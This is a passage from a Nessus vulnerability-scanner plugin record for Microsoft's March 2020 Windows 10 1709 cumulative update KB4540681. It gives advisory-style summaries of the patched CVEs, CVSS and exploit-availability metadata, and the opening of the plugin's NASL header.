(CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540681: Windows 10 Version 1709 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540681.NASL", "href": "https://www.tenable.com/plugins/nessus/134371", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134371);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540681\");\n script_xref(name:\"MSFT\", value:\"MS20-4540681\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540681: Windows 10 Version 1709 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0762)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user\u00e2\u0080\u0099s computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540681/windows-10-update-kb4540681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dc3112c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 